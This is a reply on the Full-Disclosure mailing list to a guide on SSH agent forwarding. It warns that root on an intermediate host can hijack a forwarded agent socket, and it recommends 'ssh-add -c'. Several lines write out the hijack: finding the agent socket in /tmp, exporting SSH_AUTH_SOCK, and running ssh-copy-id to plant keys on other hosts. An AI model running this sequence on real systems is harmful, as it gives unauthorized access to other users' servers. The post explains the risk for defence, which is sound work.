On Wednesday Feb 22, 2006 around 1:37pm, Steve Friedl wrote,

> Hello all,
> 
> While trying to convince a customer that he really needs to get away
> from password auth on his SSH servers, I ended up diving in to make
> some detailed notes on how key agents and forwarding work. The outcome
> of this was a new Tech Tip which explains it in some detail:
> 
>   Unixwiz.net Tech Tip: An Illustrated Guide to SSH Agent Forwarding
>   http://www.unixwiz.net/techtips/ssh-agent-forwarding.html
> 
> I hope some find this helpful.
> 
> Regards,
> Steve

Here's something you missed in the "Cons" section of agent 
forwarding:

  [EMAIL PROTECTED]:       ssh-add 
  [EMAIL PROTECTED]:         (enter key)
  [EMAIL PROTECTED]:       ssh -A customer

    [EMAIL PROTECTED]:  ssh remote

      [EMAIL PROTECTED]:  sleep 86400

And while you are sleeping:
  [EMAIL PROTECTED] does this:
        export SSH_AUTH_SOCK=`find /tmp -user lala -name 'agent.*' | head -1`   
        ssh-copy-id [EMAIL PROTECTED] 
        ssh-copy-id [EMAIL PROTECTED]
        ssh-copy-id [EMAIL PROTECTED]
        ssh-copy-id [EMAIL PROTECTED]

(Oops) (that's a lot easier than subverting ssh to insert 
something evil into the stream that will hack into the remote)

If there are untrusted machines involved you may prefer this:

  ssh-add -c

Note that ssh-agent does not identify the origin of requests for 
authentication (a bug?), so its confirmation is not fail-safe.

&:-)


-- 
Leading Edge Business Solutions              +27 11 656 0360
Linux Training, Software and Networking  http://ledge.co.za/

Linux - laai niks anders
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to